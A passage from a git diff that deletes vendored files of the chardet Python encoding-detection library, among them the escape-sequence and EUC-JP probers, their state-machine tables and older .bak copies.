ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import sys -from .escsm import HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel, ISO2022KRSMModel -from .charsetprober import CharSetProber -from .codingstatemachine import CodingStateMachine - -class EscCharSetProber(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mCodingSM = [ \ - CodingStateMachine(HZSMModel), - CodingStateMachine(ISO2022CNSMModel), - CodingStateMachine(ISO2022JPSMModel), - CodingStateMachine(ISO2022KRSMModel) - ] - self.reset() - - def reset(self): - CharSetProber.reset(self) - for codingSM in self._mCodingSM: - if not codingSM: continue - codingSM.active = True - codingSM.reset() - self._mActiveSM = len(self._mCodingSM) - self._mDetectedCharset = None - - def get_charset_name(self): - return self._mDetectedCharset - - def get_confidence(self): - if self._mDetectedCharset: - return 0.99 - else: - return 0.00 - - def feed(self, aBuf): - for c in aBuf: - # PY3K: aBuf is a byte array, so c is an int, not a byte - for codingSM in self._mCodingSM: - if not codingSM: continue - if not codingSM.active: continue - codingState = codingSM.next_state(c) - if codingState == constants.eError: - codingSM.active = False - self._mActiveSM -= 1 - if self._mActiveSM <= 0: - self._mState = constants.eNotMe - return self.get_state() - elif codingState == constants.eItsMe: - self._mState = constants.eFoundIt - self._mDetectedCharset = codingSM.get_coding_state_machine() - return self.get_state() - - return self.get_state() diff --git a/chardet/chardet/escprober.py.bak b/chardet/chardet/escprober.py.bak deleted file mode 100644 index 572ed7b..0000000 --- a/chardet/chardet/escprober.py.bak +++ /dev/null @@ -1,79 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants, sys -from escsm import HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel, ISO2022KRSMModel -from charsetprober import CharSetProber -from codingstatemachine import CodingStateMachine - -class EscCharSetProber(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mCodingSM = [ \ - CodingStateMachine(HZSMModel), - CodingStateMachine(ISO2022CNSMModel), - CodingStateMachine(ISO2022JPSMModel), - CodingStateMachine(ISO2022KRSMModel) - ] - self.reset() - - def reset(self): - CharSetProber.reset(self) - for codingSM in self._mCodingSM: - if not codingSM: continue - codingSM.active = constants.True - codingSM.reset() - self._mActiveSM = len(self._mCodingSM) - self._mDetectedCharset = None - - def get_charset_name(self): - return self._mDetectedCharset - - def get_confidence(self): - if self._mDetectedCharset: - return 0.99 - else: - return 0.00 - - def feed(self, aBuf): - for c in aBuf: - for codingSM in self._mCodingSM: - if not codingSM: continue - if not codingSM.active: continue - codingState = codingSM.next_state(c) - if codingState == constants.eError: - codingSM.active = constants.False - self._mActiveSM -= 1 - if self._mActiveSM <= 0: - self._mState = constants.eNotMe - return self.get_state() - elif codingState == constants.eItsMe: - self._mState = constants.eFoundIt - self._mDetectedCharset = codingSM.get_coding_state_machine() - return self.get_state() - - return self.get_state() diff --git a/chardet/chardet/escprober.pyc b/chardet/chardet/escprober.pyc deleted file mode 100644 index fb025d0..0000000 Binary files a/chardet/chardet/escprober.pyc and /dev/null differ diff --git a/chardet/chardet/escsm.py b/chardet/chardet/escsm.py deleted file mode 100644 index 689d9bb..0000000 --- a/chardet/chardet/escsm.py +++ /dev/null @@ -1,240 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .constants import eStart, eError, eItsMe - -HZ_cls = ( \ -1,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,0,0,0,0, # 20 - 27 -0,0,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,0,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,4,0,5,2,0, # 78 - 7f -1,1,1,1,1,1,1,1, # 80 - 87 -1,1,1,1,1,1,1,1, # 88 - 8f -1,1,1,1,1,1,1,1, # 90 - 97 -1,1,1,1,1,1,1,1, # 98 - 9f -1,1,1,1,1,1,1,1, # a0 - a7 -1,1,1,1,1,1,1,1, # a8 - af -1,1,1,1,1,1,1,1, # b0 - b7 -1,1,1,1,1,1,1,1, # b8 - bf -1,1,1,1,1,1,1,1, # c0 - c7 -1,1,1,1,1,1,1,1, # c8 - cf -1,1,1,1,1,1,1,1, # d0 - d7 -1,1,1,1,1,1,1,1, # d8 - df -1,1,1,1,1,1,1,1, # e0 - e7 -1,1,1,1,1,1,1,1, # e8 - ef -1,1,1,1,1,1,1,1, # f0 - f7 -1,1,1,1,1,1,1,1, # f8 - ff -) - -HZ_st = ( \ -eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07 -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f -eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17 - 5,eError, 6,eError, 5, 5, 4,eError,# 18-1f - 4,eError, 4, 4, 4,eError, 4,eError,# 20-27 - 4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f -) - -HZCharLenTable = (0, 0, 0, 0, 0, 0) - -HZSMModel = {'classTable': HZ_cls, - 'classFactor': 6, - 'stateTable': HZ_st, - 'charLenTable': HZCharLenTable, - 'name': "HZ-GB-2312"} - -ISO2022CN_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,0,0,0,0, # 20 - 27 -0,3,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,4,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff -) - -ISO2022CN_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 -eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f -eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 -eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27 - 5, 6,eError,eError,eError,eError,eError,eError,# 28-2f -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37 -eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f -) - -ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0) - -ISO2022CNSMModel = {'classTable': ISO2022CN_cls, - 'classFactor': 9, - 'stateTable': ISO2022CN_st, - 'charLenTable': ISO2022CNCharLenTable, - 'name': "ISO-2022-CN"} - -ISO2022JP_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,2,2, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,7,0,0,0, # 20 - 27 -3,0,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -6,0,4,0,8,0,0,0, # 40 - 47 -0,9,5,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff -) - -ISO2022JP_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 -eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 -eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f -eError, 5,eError,eError,eError, 4,eError,eError,# 20-27 -eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f -eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37 -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f -eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47 -) - -ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0) - -ISO2022JPSMModel = {'classTable': ISO2022JP_cls, - 'classFactor': 10, - 'stateTable': ISO2022JP_st, - 'charLenTable': ISO2022JPCharLenTable, - 'name': "ISO-2022-JP"} - -ISO2022KR_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,3,0,0,0, # 20 - 27 -0,4,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,5,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff -) - -ISO2022KR_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07 -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f -eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17 -eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f -eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27 -) - -ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0) - -ISO2022KRSMModel = {'classTable': ISO2022KR_cls, - 'classFactor': 6, - 'stateTable': ISO2022KR_st, - 'charLenTable': ISO2022KRCharLenTable, - 'name': "ISO-2022-KR"} diff --git a/chardet/chardet/escsm.py.bak b/chardet/chardet/escsm.py.bak deleted file mode 100644 index 9fa2295..0000000 --- a/chardet/chardet/escsm.py.bak +++ /dev/null @@ -1,240 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from constants import eStart, eError, eItsMe - -HZ_cls = ( \ -1,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,0,0,0,0, # 20 - 27 -0,0,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,0,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,4,0,5,2,0, # 78 - 7f -1,1,1,1,1,1,1,1, # 80 - 87 -1,1,1,1,1,1,1,1, # 88 - 8f -1,1,1,1,1,1,1,1, # 90 - 97 -1,1,1,1,1,1,1,1, # 98 - 9f -1,1,1,1,1,1,1,1, # a0 - a7 -1,1,1,1,1,1,1,1, # a8 - af -1,1,1,1,1,1,1,1, # b0 - b7 -1,1,1,1,1,1,1,1, # b8 - bf -1,1,1,1,1,1,1,1, # c0 - c7 -1,1,1,1,1,1,1,1, # c8 - cf -1,1,1,1,1,1,1,1, # d0 - d7 -1,1,1,1,1,1,1,1, # d8 - df -1,1,1,1,1,1,1,1, # e0 - e7 -1,1,1,1,1,1,1,1, # e8 - ef -1,1,1,1,1,1,1,1, # f0 - f7 -1,1,1,1,1,1,1,1, # f8 - ff -) - -HZ_st = ( \ -eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07 -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f -eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17 - 5,eError, 6,eError, 5, 5, 4,eError,# 18-1f - 4,eError, 4, 4, 4,eError, 4,eError,# 20-27 - 4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f -) - -HZCharLenTable = (0, 0, 0, 0, 0, 0) - -HZSMModel = {'classTable': HZ_cls, - 'classFactor': 6, - 'stateTable': HZ_st, - 'charLenTable': HZCharLenTable, - 'name': "HZ-GB-2312"} - -ISO2022CN_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,0,0,0,0, # 20 - 27 -0,3,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,4,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff -) - -ISO2022CN_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 -eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f -eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 -eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27 - 5, 6,eError,eError,eError,eError,eError,eError,# 28-2f -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37 -eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f -) - -ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0) - -ISO2022CNSMModel = {'classTable': ISO2022CN_cls, - 'classFactor': 9, - 'stateTable': ISO2022CN_st, - 'charLenTable': ISO2022CNCharLenTable, - 'name': "ISO-2022-CN"} - -ISO2022JP_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,2,2, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,7,0,0,0, # 20 - 27 -3,0,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -6,0,4,0,8,0,0,0, # 40 - 47 -0,9,5,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff -) - -ISO2022JP_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 -eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 -eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f -eError, 5,eError,eError,eError, 4,eError,eError,# 20-27 -eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f -eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37 -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f -eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47 -) - -ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0) - -ISO2022JPSMModel = {'classTable': ISO2022JP_cls, - 'classFactor': 10, - 'stateTable': ISO2022JP_st, - 'charLenTable': ISO2022JPCharLenTable, - 'name': "ISO-2022-JP"} - -ISO2022KR_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,3,0,0,0, # 20 - 27 -0,4,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,5,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff -) - -ISO2022KR_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07 -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f -eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17 -eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f -eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27 -) - -ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0) - -ISO2022KRSMModel = {'classTable': ISO2022KR_cls, - 'classFactor': 6, - 'stateTable': ISO2022KR_st, - 'charLenTable': ISO2022KRCharLenTable, - 'name': "ISO-2022-KR"} diff --git a/chardet/chardet/escsm.pyc b/chardet/chardet/escsm.pyc deleted file mode 100644 index bc66e0b..0000000 Binary files a/chardet/chardet/escsm.pyc and /dev/null differ diff --git a/chardet/chardet/eucjpprober.py b/chardet/chardet/eucjpprober.py deleted file mode 100644 index d7739f2..0000000 --- a/chardet/chardet/eucjpprober.py +++ /dev/null @@ -1,87 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import sys -from .constants import eStart, eError, eItsMe -from .mbcharsetprober import MultiByteCharSetProber -from .codingstatemachine import CodingStateMachine -from .chardistribution import EUCJPDistributionAnalysis -from .jpcntx import EUCJPContextAnalysis -from .mbcssm import EUCJPSMModel - -class EUCJPProber(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(EUCJPSMModel) - self._mDistributionAnalyzer = EUCJPDistributionAnalysis() - self._mContextAnalyzer = EUCJPContextAnalysis() - self.reset() - - def reset(self): - MultiByteCharSetProber.reset(self) - self._mContextAnalyzer.reset() - - def get_charset_name(self): - return "EUC-JP" - - def feed(self, aBuf): - aLen = len(aBuf) - for i in range(0, aLen): - # PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte - codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: - if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') - self._mState = constants.eNotMe - break - elif codingState == eItsMe: - self._mState = constants.eFoundIt - break - elif codingState == eStart: - charLen = self._mCodingSM.get_current_charlen() - if i == 0: - self._mLastChar[1] = aBuf[0] - self._mContextAnalyzer.feed(self._mLastChar, charLen) - self._mDistributionAnalyzer.feed(self._mLastChar, charLen) - else: - self._mContextAnalyzer.feed(aBuf[i-1:i+1], charLen) - self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen) - - self._mLastChar[0] = aBuf[aLen - 1] - - if self.get_state() == constants.eDetecting: - if self._mContextAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): - self._mState = constants.eFoundIt - - return self.get_state() - - def get_confidence(self): - contxtCf = self._mContextAnalyzer.get_confidence() - distribCf = self._mDistributionAnalyzer.get_confidence() - return max(contxtCf, distribCf) diff --git a/chardet/chardet/eucjpprober.py.bak b/chardet/chardet/eucjpprober.py.bak deleted file mode 100644 index 46a8b38..0000000 --- a/chardet/chardet/eucjpprober.py.bak +++ /dev/null @@ -1,85 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth 